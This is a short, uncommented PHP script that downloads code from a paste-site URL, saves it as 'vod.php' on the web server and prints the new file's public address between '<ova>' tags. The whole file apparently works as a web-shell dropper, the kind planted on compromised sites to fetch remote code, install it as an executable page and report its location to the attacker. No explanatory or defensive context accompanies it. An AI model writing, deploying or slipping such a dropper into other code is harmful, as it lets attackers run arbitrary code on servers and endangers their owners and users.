<?php
$url = 'https://rentry.co/5aqgugks/raw';
$filename = 'vod.php';  
$file_content = file_get_contents($url);

if ($file_content !== false) {
    file_put_contents($filename, $file_content);
    $server_url = "http://$_SERVER[HTTP_HOST]" . dirname($_SERVER['SCRIPT_NAME']);
    echo "<ova>$server_url/$filename<ova>";
} else {
    echo "Failed to download the file.";
}
?>